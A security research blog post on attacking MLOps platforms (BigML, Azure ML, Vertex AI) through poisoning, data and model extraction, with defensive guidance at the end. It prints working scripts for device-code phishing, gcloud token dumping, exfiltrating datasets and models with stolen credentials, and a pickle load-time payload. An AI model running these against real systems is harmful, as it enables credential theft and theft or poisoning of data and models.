For full details on this research, see the X-Force Red whitepaper “Disrupting the Model: Abusing MLOps Platforms to Compromise ML Models and Enterprise Data Lakes”.
Machine learning operations (MLOps) platforms are used by enterprises of all sizes to develop, train, deploy and monitor large language models (LLMs) and other foundation models (FMs), as well as the generative AI (gen AI) applications built on top of these models. In the rush to leverage AI throughout enterprises, security has often been overlooked in the name of progress, resulting in weak controls and direct access to sensitive data lakes and crown jewel data for retrieval augmented generation (RAG) use. As with attacks targeting development operations (DevOps), an attacker who gains unauthorized access to these MLOps platforms can cause significant impact through a variety of attacks affecting the confidentiality, integrity and availability of machine learning (ML) models and the data they provide. Threat actors are likely motivated to abuse these gaps and are pursuing early research and private toolkits to attack MLOps platforms, steal valuable FMs/LLMs and their weights, poison models used for computer vision and military applications, and compromise the sensitive enterprise datasets connected to AI-integrated applications.
This research includes a background on MLOps platforms and the machine learning security operations (MLSecOps) lifecycle, and details ways to abuse some of the most popular cloud-based and internally hosted platforms used by enterprises, such as BigML, Azure Machine Learning and Google Cloud Vertex AI. The attack scenarios include data poisoning, data extraction and model extraction. Additionally, the research includes the public release of open-source tooling to perform and facilitate these attacks, along with defensive guidance for protecting these MLOps platforms.
Key findings
- As enterprise use of MLOps platforms continues to grow, attackers will increasingly view these platforms as prime targets.
- It is critical to simulate attacks against MLOps platforms and build detections for them; public detection rules covering misuse of these platforms are currently scarce.
- Securing MLOps platforms and personnel such as data scientists and AI/ML engineers is becoming more important as the use of AI continues to grow.
Background
Prior work
The resources below represent prior work related to this research. Each is summarized, along with how this X-Force Red research differs from or builds upon it.
BigML model extraction attack
The academic whitepaper Stealing Machine Learning Models via Prediction APIs describes model extraction attacks against BigML from a black-box perspective, in which an attacker queries a published ML model to obtain predictions or input feature vectors. This X-Force Red research covers a different variation of this attack: an attacker who has compromised user access credentials (e.g., an API key) for BigML can perform model extraction from a white-box approach.
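To illustrate the difference, below is a minimal Python sketch of the white-box variant: with a compromised API key, an attacker can fetch a model's full definition directly from BigML's REST API rather than reconstructing it from prediction queries. The credential and model ID values are placeholders, and this is a simplified sketch rather than the tooling released with this research.

```python
# Minimal sketch of white-box model extraction against BigML with a
# compromised API key. Endpoint and auth parameters follow BigML's public
# REST API; credential and ID values are placeholders.
import json
import requests

AUTH = "username=<victim-user>;api_key=<stolen-api-key>"
MODEL_ID = "model/<model-id>"   # discovered via GET https://bigml.io/model

# Fetch the full model definition (fields, tree structure, etc.)
resp = requests.get(f"https://bigml.io/{MODEL_ID}?{AUTH}")
model_definition = resp.json()

with open("stolen_model.json", "w") as f:
    json.dump(model_definition, f, indent=2)
print("Extracted model definition for", MODEL_ID)
```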
Code execution within training and operations environments
Adrian Wood and Mary Walker published research at Black Hat Asia 2024 that covers modifying models in open-source repositories such as Hugging Face to facilitate code execution when those models are used in training and operations environments. This X-Force Red research provides only an overview of that type of code execution attack via model modification; it focuses instead on extracting sensitive data from models and enterprise data lakes and poisoning training data within cloud-based and internally hosted MLOps platforms used by enterprises. Additionally, this research directly targets MLSecOps and includes the release of open-source tooling to attack MLOps platforms.
Obtaining credentials from Azure Machine Learning resources
Nitesh Surana published a Trend Micro blog post detailing a vulnerability (CVE-2023-23382) they discovered in which credentials were logged in cleartext within some Azure Machine Learning workspace resources, such as Azure file shares and storage blobs. Nitesh also presented that research at Black Hat USA 2023. This X-Force Red research does not cover or include that attack. Instead, it focuses on conducting training data poisoning, training data extraction and model extraction attacks through compromised user access via the Azure Machine Learning web interface, Azure CLI, REST API and a custom toolkit.
Threat actor motivations
Threat actors are becoming more motivated to attack and compromise MLOps platforms due to the critical role these platforms now play. In 2024, the first known in-the-wild attack against an AI framework was discovered. High-level motivations for threat actors include:
- Cost reduction – By stealing training data and model artifacts, an attacker avoids the considerable cost of developing and training a model themselves.
- Sensitive data – For models utilizing private training datasets, the data can include sensitive information such as personally identifiable information (PII) and protected health information (PHI). RAG data can also be a sensitive asset an attacker could target.
- Data extortion – Since these private models and datasets are sensitive, an attacker could target them as part of a ransomware or data extortion attack and threaten to release the data unless a ransom is paid.
- Denial of service – An attacker seeking to be destructive could poison or backdoor a model to degrade the reliability and accuracy of the service that relies on it.
What is MLOps?
Machine learning operations (MLOps) is the practice of deploying and maintaining ML models in a secure, efficient and reliable way. The goal of MLOps is to provide a consistent, automated process for rapidly getting an ML model into production. MLOps exists at the intersection of machine learning, DevOps and data engineering, as shown in the diagram below.
Figure 1: Diagram showing the intersection for MLOps
An MLOps lifecycle exists for an ML model to go from design all the way to deployment.
MLOps lifecycle
The five primary phases involved in the MLOps lifecycle include design, develop/build, test, deploy and manage.
Figure 2: MLOps lifecycle
Design
This phase involves collecting, sanitizing and organizing data so that it can be used in an efficient manner for training a model. This is the most critical phase of the MLOps lifecycle, as the quality of the model completely depends on the quality of data being input.
Develop/Build
The next phase includes training ML models based on the data from the design phase. This includes selecting a framework to be used for the training and optimizing the performance of the model.
Test
After a model has been built, testing needs to occur to ensure the trust, quality and performance of the model are sufficient. Constant evaluation of the model is also performed during this phase. The purpose of evaluating a model is to test the accuracy of its output and answer the question, “Is this model accomplishing the goal that was set forth for it?”
Deploy
After a model has been sufficiently trained, evaluated and tested, it is time for it to be deployed to production. During this phase, requirements are gathered for the computing power needed to run the model efficiently, and the method for deploying and using the model in production is determined, for example, exposing the model as a REST API.
Manage
Once a model is deployed in production, it must be monitored to ensure that it is reliable and that the infrastructure it runs on is healthy. During this phase, metrics are constantly collected and analyzed to determine whether the model is performing in an accurate and responsive manner. As the model continues to be used, there may come a point where the data it provides is outdated or business requirements have changed. At that point, the deployed model may be retired so that a new model can be trained and deployed in its place, restarting the MLOps lifecycle at the “Design” phase.
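As a small illustration of that monitoring-to-retirement decision, the sketch below compares a model's recent accuracy against a threshold and flags it for retraining; the metrics source is a hypothetical stand-in for whatever monitoring system is in place.

```python
# Minimal sketch of a "Manage" phase check: retire/retrain the model when
# recent accuracy drops below an acceptable threshold.
RETRAIN_THRESHOLD = 0.90

def get_recent_accuracy() -> float:
    """Placeholder: in practice this would query the monitoring/metrics system."""
    return 0.87

if get_recent_accuracy() < RETRAIN_THRESHOLD:
    print("Model performance degraded: retire the model and restart at the Design phase.")
```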
Popular MLOps platforms
All the phases discussed above can be conducted within an MLOps platform, which provides a single place to carry out the entire MLOps lifecycle. Several well-known MLOps platforms are used by enterprises of all sizes, including the cloud-based and internally hosted platforms covered in this research: Azure Machine Learning, BigML and Google Cloud Vertex AI.
Attack scenarios against MLOps lifecycle
There are several well-known attacks that can be performed against the MLOps lifecycle to affect the confidentiality, integrity and availability of ML models and associated data. However, performing these attacks against an MLOps platform using stolen credentials has not been covered in public security research. An example attack path is shown below where an attacker could gain the privileges required to perform a model extraction attack against an MLOps platform.
Figure 3: Example of MLOps-focused attack path
This X-Force Red research focuses on attacks against MLOps platforms after an attacker has obtained valid credential material, and on how to detect these attacks. Common methods for obtaining the credential material required to access MLOps platforms include, but are not limited to, searching file shares, intranet sites, user workstations and other unprotected or misconfigured internal network resources, as well as social engineering.
Figure 4: Diagram showing research focus
In the whitepaper associated with this blog post, it is demonstrated how to perform several attacks such as data poisoning, data extraction and model extraction in some of the most popular MLOps platforms.
Data poisoning
In this attack, an attacker with access to the raw data used in the “Design” phase of the MLOps lifecycle either introduces attacker-provided data or directly modifies a training dataset. The goal of a data poisoning attack is to influence the data an ML model is trained on before the model is eventually deployed to production.
Figure 5: Data poisoning diagram
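As a toy illustration of the dataset modification path, the following sketch flips labels on a small fraction of rows in a staged CSV training dataset. The file name, column name and label values are hypothetical.

```python
# Toy sketch of training data poisoning via direct modification of a staged
# CSV dataset. Flipping a small fraction of labels biases the trained model
# toward misclassifying the attacker's chosen class.
import csv

PATH = "training_data.csv"          # hypothetical staged dataset
with open(PATH, newline="") as f:
    rows = list(csv.DictReader(f))

for row in rows[::20]:              # roughly 5% of records
    if row["label"] == "malicious": # hypothetical label column and values
        row["label"] = "benign"

with open(PATH, "w", newline="") as f:
    writer = csv.DictWriter(f, fieldnames=rows[0].keys())
    writer.writeheader()
    writer.writerows(rows)
```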
Data extraction
In this attack, an attacker extracts the training data being used as part of the MLOps lifecycle. This data could be used by an attacker to train their own model or to gain deeper insight into how the model is being trained for future attacks. Additionally, depending on the classification of the data used to train the model, an attacker may be able to extract sensitive information such as PII, PHI or even credentials if the model is being used as a coding assistant.
Figure 6: Diagram showing data extraction attack
Model extraction
Model extraction attacks involve an attacker stealing a trained ML model that is deployed in production. An attacker could use a stolen model to extract sensitive information such as the trained weights, or leverage the model’s predictive capabilities for their own financial gain. For example, an attacker could use a stolen model trained to predict commodity futures for financial gain.
An attacker has two primary options when performing model extraction: extracting the model before deployment or after deployment, as shown in the respective diagrams below:
Figure 7: Performing model extraction before deployment
Figure 8: Performing model extraction after deployment
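For contrast with the credential-based approach used throughout this research, the sketch below illustrates the classic post-deployment, query-based form of model extraction: label attacker-chosen inputs with the victim model's predictions and train a substitute on them. A local scikit-learn model stands in for a deployed prediction endpoint, so everything here is illustrative.

```python
# Illustrative sketch of post-deployment model extraction via prediction
# queries: collect the victim model's answers to attacker-chosen inputs and
# train a substitute model on those query/response pairs.
import numpy as np
from sklearn.linear_model import LogisticRegression
from sklearn.tree import DecisionTreeClassifier

rng = np.random.default_rng(0)

# Stand-in "victim" model (normally only reachable through its prediction API)
X_secret = rng.normal(size=(500, 4))
y_secret = (X_secret[:, 0] + X_secret[:, 1] > 0).astype(int)
victim = LogisticRegression().fit(X_secret, y_secret)

# Attacker queries the victim with synthetic inputs and keeps the answers
X_query = rng.normal(size=(2000, 4))
y_stolen = victim.predict(X_query)

# Substitute model trained purely on the stolen query/response pairs
substitute = DecisionTreeClassifier().fit(X_query, y_stolen)
agreement = (substitute.predict(X_query) == y_stolen).mean()
print(f"Substitute agrees with victim on {agreement:.1%} of queries")
```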
Evasion attacks
Evasion attacks trick a deployed ML model into misclassifying attacker-controlled input. A common example in the cybersecurity industry is evading email spam filtering solutions. These products rely on ML models trained to determine whether a given email is malicious, and an evasion attack involves crafting spam emails that slip past the classifiers those models have learned.
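The toy sketch below shows the idea against a tiny bag-of-words spam classifier: padding a spam message with words the model associates with legitimate mail can flip its verdict. The training corpus and classifier are illustrative stand-ins, not a real email security product.

```python
# Toy sketch of an evasion attack: append benign "good words" to a spam
# message until a simple bag-of-words model changes its classification.
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.naive_bayes import MultinomialNB
from sklearn.pipeline import make_pipeline

train_msgs = ["win free money now", "claim your free prize",
              "meeting agenda attached", "quarterly report review"]
labels = ["spam", "spam", "ham", "ham"]
clf = make_pipeline(CountVectorizer(), MultinomialNB()).fit(train_msgs, labels)

spam = "win free money now"
print(clf.predict([spam]))        # ['spam']

# Evasion: pad the message with words the model associates with ham
evasive = spam + " meeting agenda quarterly report review attached" * 3
print(clf.predict([evasive]))     # ['ham'], the padded message evades the filter
```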
Code execution within training and operations environments
By modifying an ML model, an attacker can insert code that executes whenever the model is loaded, as highlighted in the diagrams below:
Figure 9: Adding malicious code to a model
Figure 10: Code executes in training and operations environments
This was demonstrated in a recent attack where over 100 models within Hugging Face were modified to include a reverse shell. This is possible because certain ML model formats support code execution, as outlined in this resource. An example is the pickle format, which allows Python objects to be serialized. If an attacker gains “modify” access to a model stored in one of these formats, they can execute code whenever the victim model is loaded in training or operations environments.
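A minimal sketch of why the pickle format enables this is shown below: an attacker-controlled __reduce__ method runs arbitrary code the moment the serialized "model" is loaded. The payload here simply echoes a message; a real attack would launch something like a reverse shell.

```python
# Minimal sketch of pickle-based code execution in a "model" file.
import os
import pickle

class MaliciousModel:
    def __reduce__(self):
        # Whatever this returns is executed when the pickle is loaded
        return (os.system, ("echo code executed on model load",))

with open("model.pkl", "wb") as f:
    pickle.dump(MaliciousModel(), f)

# Victim side: simply loading the "model" runs the attacker's command
with open("model.pkl", "rb") as f:
    pickle.load(f)
```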
Attacking MLOps platforms
The following sections will give an overview of how to conduct some of the attacks highlighted in the Attack scenarios against MLOps lifecycle section above in a few of the most popular MLOps platforms such as Azure Machine Learning (Azure ML), BigML and Google Cloud Vertex AI (Vertex AI). For full details, see the whitepaper.
Azure Machine Learning
Azure ML is a popular MLOps platform that contains all the functionality needed to facilitate a full MLOps lifecycle. The main component within Azure ML Studio is the workspace, which contains all the ML assets and components needed to develop and deploy an ML model into production.
Figure 11: Components of AML service (https://www.trendmicro.com/vinfo/gb/security/news/cybercrime-and-digital-threats/uncovering-silent-threats-in-azure-machine-learning-service-part-I)
An example attack scenario against Azure ML could start with an attacker performing a device code phishing attack against a Data Scientist, allowing the attacker to obtain an Azure access token as the targeted user.
Figure 12: Device code phishing against a Data Scientist
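For reference, the device code flow itself is straightforward to drive programmatically. The sketch below uses the Microsoft identity platform's documented device code endpoints; the tenant value is a placeholder, and the client ID shown is the well-known public Azure CLI application ID, a common choice because the resulting token can call Azure Resource Manager (and therefore Azure ML).

```python
# Minimal sketch of the OAuth 2.0 device code flow abused in device code phishing.
import time
import requests

TENANT = "<target-tenant-id>"                       # placeholder
CLIENT_ID = "04b07795-8ddb-461a-bbee-02f9e1bf7b46"  # well-known Azure CLI app ID
SCOPE = "https://management.azure.com/.default offline_access"
BASE = f"https://login.microsoftonline.com/{TENANT}/oauth2/v2.0"

# Step 1: request a device code and deliver the user_code/message to the victim
dc = requests.post(f"{BASE}/devicecode",
                   data={"client_id": CLIENT_ID, "scope": SCOPE}).json()
print("Send to victim:", dc["message"])   # contains the code and sign-in URL

# Step 2: poll for a token; it is issued once the victim completes sign-in
while True:
    tok = requests.post(f"{BASE}/token", data={
        "grant_type": "urn:ietf:params:oauth:grant-type:device_code",
        "client_id": CLIENT_ID,
        "device_code": dc["device_code"],
    }).json()
    if "access_token" in tok:
        print("Access token obtained for the targeted user")
        break
    time.sleep(dc.get("interval", 5))
```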
With an Azure access token, the attacker can access the Azure ML REST API as the compromised Data Scientist user.
Figure 13: Gaining access to Azure ML
After successfully gaining access to the Azure ML REST API, an attacker can exfiltrate any available models from Azure ML. Full details on this process are included in the whitepaper.
Figure 14: Exfiltrating models from Azure ML
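As a simplified example of what that API access looks like, the sketch below lists registered models in a workspace via the Azure ML management REST API using the stolen bearer token. Subscription, resource group and workspace values are placeholders, the api-version is simply one that was current at the time of writing, and the full exfiltration workflow is detailed in the whitepaper.

```python
# Minimal sketch of model reconnaissance against the Azure ML REST API with a
# stolen ARM access token. Resource identifiers are placeholders.
import requests

TOKEN = "<stolen-access-token>"
SUB, RG, WS = "<subscription-id>", "<resource-group>", "<workspace>"
URL = (f"https://management.azure.com/subscriptions/{SUB}/resourceGroups/{RG}"
       f"/providers/Microsoft.MachineLearningServices/workspaces/{WS}"
       f"/models?api-version=2023-10-01")

resp = requests.get(URL, headers={"Authorization": f"Bearer {TOKEN}"})
for model in resp.json().get("value", []):
    print(model["name"], model["id"])
```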
BigML
BigML is another MLOps platform that is used by many customers to manage the full MLOps lifecycle of their ML models.
An example attack scenario against BigML could start with an attacker discovering secrets in a public source code repository that grant access to an organization’s BigML instance, for example, an API key for the BigML REST API exposed on GitHub.
Figure 15: Discovering BigML API key
This API key would facilitate initial access to BigML for the target organization.
Figure 16: Obtaining access to BigML REST API
After obtaining initial access to an organization’s BigML instance, an attacker could exfiltrate private datasets using the REST API. Full details on this process are included in the whitepaper.
Figure 17: Exfiltrating datasets from BigML
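A minimal sketch of that exfiltration step is shown below, assuming only the leaked API key: enumerate the datasets visible to the compromised account and pull each one down as CSV via BigML's documented download endpoint. Credential values and file handling are placeholders.

```python
# Minimal sketch of dataset exfiltration from BigML with a leaked API key.
import requests

AUTH = "username=<victim-user>;api_key=<leaked-api-key>"
BASE = "https://bigml.io"

# Enumerate datasets visible to the compromised account
datasets = requests.get(f"{BASE}/dataset?{AUTH}").json()
for ds in datasets.get("objects", []):
    ds_id = ds["resource"]                      # e.g., "dataset/66a1..."
    # Export the dataset as CSV via the download endpoint
    csv_data = requests.get(f"{BASE}/{ds_id}/download?{AUTH}")
    with open(ds_id.replace("/", "_") + ".csv", "wb") as f:
        f.write(csv_data.content)
    print(f"[+] Exfiltrated {ds_id}")
```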
Google Cloud Vertex AI
Google Cloud has an MLOps platform named Vertex AI, which contains all the components needed to facilitate the MLOps lifecycle.
An example attack scenario against Vertex AI could start with an attacker performing a phishing attack in which a user executes a Cobalt Strike beacon. From there, the attacker abuses Active Directory to escalate their privileges in the environment.
Figure 18: Gaining initial access and escalating privileges
With elevated privileges in the environment, an attacker could then perform lateral movement to an ML engineer’s workstation. Because the ML engineer in this case uses the gcloud CLI to access Google Cloud resources, the attacker can dump gcloud access tokens from the user’s workstation.
Figure 19: Performing lateral movement to ML Engineer workstation
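A rough sketch of that token theft is below. It assumes the default gcloud CLI credential store layout at the time of writing (an SQLite database at ~/.config/gcloud/access_tokens.db containing an access_tokens table); paths and table names may differ across gcloud versions.

```python
# Minimal sketch of dumping cached gcloud access tokens from a compromised
# workstation, assuming the default gcloud credential store layout.
import os
import sqlite3

db_path = os.path.expanduser("~/.config/gcloud/access_tokens.db")
conn = sqlite3.connect(db_path)
for row in conn.execute("SELECT * FROM access_tokens"):
    # Rows include the account and its cached bearer token with expiry
    print(row)
conn.close()
```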
The attacker is able to access Vertex AI using the stolen access token and exfiltrate any models the compromised ML engineer has access to. Full details on this process are included in the whitepaper.
Figure 20: Exfiltrating model from Vertex AI
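The sketch below outlines that final step with the stolen token: list the models visible to the compromised ML engineer through the Vertex AI REST API, then request an export of a model's artifacts to a Cloud Storage location the attacker can read. Project, region, bucket and the exact export fields are placeholders/assumptions; downloading the exported files is covered in the whitepaper.

```python
# Minimal sketch of model reconnaissance and export against Vertex AI using a
# stolen access token. Identifiers and export fields are placeholders.
import requests

TOKEN = "<stolen-access-token>"
PROJECT, REGION = "<project-id>", "us-central1"
API = f"https://{REGION}-aiplatform.googleapis.com/v1"
HEADERS = {"Authorization": f"Bearer {TOKEN}"}

# Model reconnaissance
models = requests.get(
    f"{API}/projects/{PROJECT}/locations/{REGION}/models", headers=HEADERS
).json().get("models", [])
for m in models:
    print("[+] Found model:", m["displayName"], m["name"])

# Request an export of the first model's artifacts to an attacker-readable bucket
if models:
    body = {"outputConfig": {
        "exportFormatId": "custom-trained",
        "artifactDestination": {"outputUriPrefix": "gs://<attacker-readable-bucket>/export/"},
    }}
    op = requests.post(f"{API}/{models[0]['name']}:export",
                       headers=HEADERS, json=body).json()
    print("Export operation started:", op.get("name"))
```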
MLOKit
Background
X-Force Red analysts wanted to take advantage of the REST API functionality in the MLOps platforms covered in this research and packaged the most useful functionality into a tool called MLOKit. The goal of this tool is to provide awareness of the potential abuse of MLOps platforms and to facilitate the detection of attack techniques against them. The tool enables both offensive and defensive security practitioners to simulate attacks against the supported MLOps platforms (Azure ML, BigML and Vertex AI) to improve the security posture and configuration of these platforms in their environments. MLOKit was built in a modular way so that new MLOps platforms and modules can be added in the future by the information security community. The tool and full documentation are available on the X-Force Red GitHub. Example use cases are shown in the next sections.
Reconnaissance
Below are some useful reconnaissance modules available within MLOKit. For full documentation, see the MLOKit GitHub repository.
Check access credentials
After you have initially obtained credentials to an MLOps platform, you will want to validate those credentials using the check module. In this case, we are validating credentials to Azure ML.
Example output is shown below where we validate access to Azure ML with a stolen access token.
Figure 21: Using the check module against Azure ML
List projects/workspaces
After access has been validated to an MLOps platform, you will want to start listing the projects (workspaces in Azure ML) that you have access to by using the list-projects module. In this example, we are listing the available projects in Vertex AI.
Example output is shown below, which includes all the projects we have access to with the stolen credentials for Vertex AI.
Figure 22: Using the list-projects module against Vertex AI
List datasets
After listing the available projects or workspaces, you will want to list the datasets or models included in those projects. In this example, we are listing all the available datasets within BigML.
In the example output below, MLOKit lists the available datasets, along with details such as the dataset ID and more.
Figure 23: Using list-datasets module against BigML
List models
You will also want to perform model reconnaissance to see what models you have access to with a compromised credential. In this example, we are listing all the available models within the “coral-marker-414313” project in Vertex AI.
The output includes the available models, along with attributes such as name, model ID and more.
Figure 24: Using list-models module against Vertex AI
Training data extraction
Now that you have validated access to an MLOps platform and have performed reconnaissance on the available datasets, you will want to steal the available training datasets using the download-dataset module. We will be downloading a dataset from the BigML MLOps platform in this example.
This will download the dataset to your current working directory with the file name MLOKit-[random 8 characters].
Figure 25: Using the download-dataset module against BigML
Model extraction
Previously, we listed the available models in Vertex AI. Now we will download a model in Vertex AI by using the download-model module.
This will download all corresponding model files to your current working directory. First, the model is exported to a Google Cloud Storage location that you have access to with your compromised credentials.
Figure 26: Using download-model module against Vertex AI
Then it will download all the files from that location.
Figure 27: Downloading model files
The directory structure is maintained for the downloaded files to mimic the exported folder in Google Cloud storage.
Figure 28: Showing downloaded files
Defensive considerations and guidance
X-Force Red has several defensive considerations for the MLOps platforms covered in this research related to configuration best practices and guidance on detection rule creation for the attack scenarios shown. Full details are included in the whitepaper.
MLOps platforms – Configuration guidance
Below is a summary of configuration guidance for the MLOps platforms covered in this research.
Azure ML
Microsoft has a guide on security best practices for securing your Azure ML instance. This includes best practices for restricting access to resources and operations, restricting network communications, encrypting data in transit and at rest, scanning container registries for vulnerabilities and applying the Azure Policy governance tool. Microsoft also provides a security baseline for the Azure ML service here.
Another great resource for securing your Azure ML instance is here. Below is a summary of the guidance:
- Collect and manage inventory of ML assets, which include models, workspaces, pipelines, endpoints and datasets. Understand if there are any third-party dependencies for these assets.
- Have personnel participate in training to learn about security risks and vulnerabilities associated with ML.
- Include ML solutions in threat modeling exercises.
- Perform best practices on data used throughout Azure ML, such as adopting best practices for identity and access management and data encryption.
- Implement security best practices for ML workflows, such as network isolation, role-based access, securing secrets and performing auditing and monitoring of ML assets.
- Build detections for the below scenarios:
- Exfiltration of training datasets
- Unauthorized access to training data
- Identification of model performance impacts
- Vulnerabilities in software components involved with ML workflow
- Unusual or abnormal requests being conducted against a published model
BigML
Below are configuration recommendations for BigML:
- Enable MFA
- Rotate credentials frequently, including API keys, which have no expiration date.
- Apply granular access controls for users who can access and interact with resources such as projects and organizations. This is possible via alternative keys in BigML, which provide fine-grained access to REST API resources.
Vertex AI
There is a great resource available here, which outlines best practices for securing your Vertex AI instance. This includes the below-summarized guidance:
- Apply the principle of least privilege for user access and ensure users can only access components that align with their roles
- Apply the principle of least privilege for service accounts, and ensure they only have access to a specific Vertex AI workbench pipeline
- Use IAM User Management to manage user roles and group memberships
- Disable External IP addresses within Vertex AI
- Enable Virtual Private Cloud (VPC) service controls
- Enable Data Access audit logs, so that you can log and build alerts for anomalous activity
Additionally, consider implementing Security Command Center protection for Vertex AI, which helps enhance the security of your Vertex AI applications.
MLOps platforms – Detection guidance
Detailed detection guidance and rules for the MLOps platforms covered in this research are included in the whitepaper, which includes details on how to detect the below attack scenarios.
- Dataset poisoning
- Dataset reconnaissance
- Model reconnaissance
- Dataset extraction
- Model extraction
Conclusion
Organizations continue to accelerate their adoption of AI to advance their businesses, which has quickly made ML technologies critical to business operations for enterprises of all sizes. The increased use of MLOps platforms to create, manage and deploy ML models will lead attackers to view these platforms as attractive targets. As such, it is critical to properly secure these MLOps platforms and to understand how an attacker could abuse them to conduct attacks such as data poisoning, data extraction and model extraction. X-Force Red’s goal is for this research to bring more attention to this attack surface and inspire future research on defending business-critical MLOps platforms and services.
Acknowledgments
A special thank you to the below people for giving feedback on this research and providing blog post content review:
Adversary Simulation, X-Force Red
Global Head of X-Force Red